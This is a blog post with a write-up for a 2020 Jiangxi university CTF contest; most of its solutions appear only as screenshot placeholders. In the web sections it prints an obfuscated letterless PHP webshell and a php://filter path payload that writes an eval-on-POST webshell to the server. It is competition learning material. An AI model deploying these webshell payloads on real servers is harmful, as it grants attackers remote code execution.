2020年江西省大学生信息安全技术大赛Writeup

最新推荐文章于 2023-03-11 11:27:15 发布
最新推荐文章于 2023-03-11 11:27:15 发布
阅读量2.5k 收藏 21
点赞数 3
分类专栏: CTF Writeup 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yescomecn/article/details/109320031
版权

2020年江西省大学生信息安全技术大赛Writeup

一、WEB

0x01 web1-找色差嘛

题解1-官方

image-20201027194831403

image-20201027194929844

image-20201027194941703

image-20201027195005245

题解2-江西软件职业技术大学

burpsuite 抓包直接改传参,返回包里面存有flag

0x02 web2

这道题好像是官方配置有问题,在一个容器里面有多个漏洞环境,很容易getshell,但是找不到flag,官方最后换了题

题解1-无

0x03 web3-Easy_console

题解1-官方

image-20201027195428526

image-20201027195441990

image-20201027195501723

image-20201027195532675

image-20201027195547942

image-20201027195603641

image-20201027195619674

image-20201027195630674

题解2-江西软件职业技术大学

这题试了挺多方法的

image-20201027195913236

慢日志写shell 失败

image-20201027195737822

写日志getshell 失败

image-20201027195818799

最后在文件上传位置上传getshell

image-20201027195955861

无字母一句话getshell

<?php $__=[]; $_=($__==$__); $__=~(融); $___=$__[$_]; $__=~(匆); $___.=$__[$_].$__[$_]; $__=~(随); $___.=$__[$_]; $__=~(千); $___.=$__[$_]; $__=~(苦); $___.=$__[$_]; $____=~(~(_)); $__=~(诗); $____.=$__[$_]; $__=~(尘); $____.=$__[$_]; $__=~(欣); $____.=$__[$_]; $__=~(站); $____.=$__[$_]; $_=$$____; $___($_[_]);

0x04 web4-Ezexit

题解1-官方

image-20201027200116537

题解2-江西软件职业技术大学

https://xz.aliyun.com/t/7457

image-20201027200328026

image-20201027200353148

image-20201027200414231

image-20201027200436094

image-20201027200454766

path=php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../h.php

二、MISC

Different_P

image-20201027202215860

image-20201027202230775

image-20201027202243021

奇怪的杂项

image-20201027201808897

image-20201027201819876

image-20201027201830138

神秘文件

image-20201027201902750

image-20201027201916064

image-20201027201932280

image-20201027201942701

newbie_rsa

image-20201027200814665

image-20201027200826766

image-20201027200837495

image-20201027200847050

三、REVERSE

ReMe

image-20201027200953650

image-20201027201006214

image-20201027201029918

image-20201027201040805

image-20201027201052479

image-20201027201113499

findme

image-20201027200601007

image-20201027200649309

image-20201027200700219

image-20201027200710600

image-20201027200737492

四、PWN

easy_rop

image-20201027202347095

image-20201027202359212

image-20201027202411777

image-20201027202422316

image-20201027202434842

image-20201027202449418

image-20201027202503853

image-20201027202519155

image-20201027202531363

Summeron

image-20201027201257061

image-20201027201344267

image-20201027201359990

image-20201027201415075

五、CRYPTO

babyCrypto

image-20201027202042600

image-20201027202057573

image-20201027202109123

image-20201027202127409

港独密报

image-20201027201522812

image-20201027201548760

image-20201027201601942

image-20201027201626177

image-20201027201638258

image-20201027201649553

image-20201027201659154

black_doufu
关注
  • 3
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
山东省大学生网络安全技能大赛决赛Writeup.pdf
09-30
山东省大学生网络安全技能大赛决赛Writeup 本文档总结了山东省大学生网络安全技能大赛决赛的Writeup,涵盖了Crypto0x00 RSA1、RSA2和仿射加密三个部分的知识点。 Crypto0x00 RSA1 在Crypto0x00 RSA1部分中,我们...
测测你的眼睛对色差的辨识度?抱歉我开挂了……【JavaScript脚本实现色差小游戏自动刷关】
qq_44888152的博客
11-30 5449
好久没写博客了,这几个月一直在忙,学前端,JavaWeb之类的。之前说的PAT甲级等我刷完再来补吧,前天考完团队程序设计天梯赛,昨天又接着干CTF。今天给大家来点好玩的东西,编写JavaScript脚本实现自动闯关色差小游戏。先给出一个链接:色差小游戏。 昨天了好一会才到的,点击开始游戏后摁下F12,观察它的结构,我们发现所有的色块都在一个box块里。 于是想法就来了,那我们是不是可以编写一个脚本去自动闯关呢?答案是肯定的,不然我也不会废话这么多。。。 先来说下思路吧,要遍历每一个色块,肯定要获.
2020第三届江西省高校网络安全技能大赛 线下赛 CTF&AWD Writeup
末初的CSDN博客
09-19 3772
文章目录CTFMiscBoring_exe!_ezAffineDaylightBlueWebAurora websiteweb2(忘了叫啥名)CryptoInterceptedtelegramAWDAWD1AWD2 CTF Misc Boring_exe !_ ..... ..... ..... ..... !?!!. ?.... ..... ..... ..... .?.?! .?... .!... ..... ..... !.?.. ..... !?!!. ?!!!! !!?.? !.?!! !!!.
江西省信息技术知识竞赛
qq_73289653的博客
03-11 4812
江西省信息技术知识竞赛 202210月30上午进行的比赛,目前官网已经公布了比赛结果,直接百度:江西教育网 获奖公示 关于2022江西省大学生信息技术知识赛获奖 获奖名单 江西教育网 竞赛方案 2022江西省大学生信息技术知识大赛竞赛方案(网址) 专科非专业二等奖,对于这个奖项还是比较开心的,因为花的时间确实没有别人多,那时候还在准备蓝桥杯。谈谈这个比赛专科非专业组的信息与刷题技巧,以后有机会参加专业组的还会发布,虽然是个省赛,但是想要了解的信息非常少。不过这个比赛对专升本的计算机应用基础蛮有
设计《色差小游戏》 自动化脚本
Specif1c的博客
10-30 3077
今天在B站看到一UP主用Python写了一个《色差小游戏》自动化脚本,看着挺意思的,自己玩了下这个游戏,最多到25关就不行了,我想着我干嘛不用JavaScript写个自动化脚本,let`s do it 游戏网址: http://www.cuishuai.cc/game/ 这位UP主 做的脚本相对较为复杂,咱们就做个相对简单的。 准备工具: 浏览器: 火狐或者Google 支持运行js脚本的浏览器插件:Tampermonkey 设计思路: 先F12打开小游戏网页代码查看器 可以很快看.
个人CTF入门训练过程WriteUp
LastButNotLeast的博客
11-18 1861
(view-source:http://www.monyer.com/game/game1/) 查看网页源代码 → <a href="first.php"></a> ← php
2021CTF工业信息安全技能大赛(杭州站)
08-02
【标题】"2021CTF工业信息安全技能大赛(杭州站)" 描述了一次重要的信息安全竞赛活动,该活动在2021于杭州举行,聚焦于工业信息安全领域。CTF,全称Capture The Flag,是信息安全领域的常见比赛形式,通常包含解谜...
2024江苏省信息安全评估与管理省赛样题(内含一阶段writeup)
最新发布
01-10
2024江苏省信息安全评估与管理省赛样题(内含一阶段writeup)2024江苏省信息安全评估与管理省赛样题(内涵d一阶段writeup) 2024江苏省信息安全评估与管理省赛样题(内涵d一阶段writeup) 2024江苏省信息安全评估...
2018全国大学生信息安全竞赛web题出题docker+writeup.zip
11-09
信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用...
0ops CTF/0CTF writeup
weixin_30820151的博客
10-31 437
0×00 0CTF『第一届0ops信息安全技术挑战赛,即0ops Capture The Flag,以下简称0CTF。 0CTF由上海交通大学网络信息中心和上海市信息安全行业协会指导,由上海交通大学信息网络安全协会承办,是2014信息安全技能竞赛校园赛首站。0CTF注册与参赛地址为http://ctf.0ops.net。 比赛时间为北京时间20143月1日至2日,每天7时至23时,共32小时。』...
全国信息技术大赛题目和答案
03-26
全国信息技术大赛题目和答案 经过自己的验证哦
2021江西省大学生信息技术知识大赛题库(最新版).xls
10-30
2021江西省大学生信息技术知识大赛 目的:主要体现当代大学生对于现代信息技术知识的掌握水平。 参赛对象:全日制在籍本科、高职高专学生。
江西省信息技术知识大赛公开题库(答案填色版)
10-26
答案填色版,适合背题
全国信息技术大赛比赛题
04-29
全国信息技术大赛FLASH 比赛题。包括预赛、复赛、决赛近三届的所有题目。
2018江西省信息技术知识竞赛公开题库.xls
05-14
江西省信息技术知识竞赛公开题库,含答案,内容丰富
CG-CTF-Web-bypass again
1stPeak's Blog
07-01 684
bypass again 1.查看题目 2.进入题目地址 3.代码分析 if (isset($_GET['a']) and isset($_GET['b'])) //检测变量a和变量b是否设置并且不为NULL,存在的话执行大括号里的 { if ($_GET['a'] != $_GET['b']) //if(a不等于b)并且if(md5(a)==md5(b))成立,执行die,否则执行p...
2020 第三届江西省高校网络安全技能大赛 线上赛Writeup
Henlenl的博客
09-02 1737
本次比赛Writeup由:江西软件职业技术大学 信息安全协会 提供 本次比赛江软参赛高职组最终成绩如下: 赛题类型MiscMisc1-HelloMisc2-encryptMisc3-jumpMisc4-BurpsMisc5-TreesMisc6-qrcodeMisc7-blindMisc8-musicWebWeb1-AuditWeb2-scannerWeb3-greatctfWeb4-AdminReverseReverse1-BabyreReverse2-CheckReverse3-CrackmeRe.
ThinkPHP 5.0 低版本反序列化漏洞利用
weixin_46236101的博客
10-19 1128
前言 背景 日常渗透测试中,ThinkPHP低版本的站点虽然很少,但是总会有的,之前有大佬公开5.0.*的利用链,是适合中高版本的ThinkPHP框架,由于一些代码的改动,导致在某些地方并不能兼容所有的版本。 比如: 在5.0.16版本以下,HasOne类的getRelation的触发点removeWhereField方法未被调用。 在5.0.11版本以下,model类得三目运算符处的出发点不存在。 在5.0.4版本以下,触发的位置又有所不同。 本文将对已知反序列化利用链进行分析,并对比新老版本差异,构造
Thinkphp5.0.x_RCE复现&5.0.24反序列化大礼包
大博的博客
08-07 6383
环境部署 以TP5.0.22为例 + PHP 5.6.27-NTS + phpstorm2020.1 反序列化环境为:TP5.0.24 + PHP 5.6.27-NTS + phpstorm2020.1 漏洞成因 现在TP的RCE通常将其分成两类: Request类其中变量被覆盖导致RCE 路由控制不严谨导致可以调用任意类致使RCE 反序列化的应用(需要存在反序列化的地方) Request类其中变量被覆盖导致RCE 我们以这个POC为例,进行复现: 我们正常的代码逻辑已经简单的写在了前文,如有代码执行疑
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值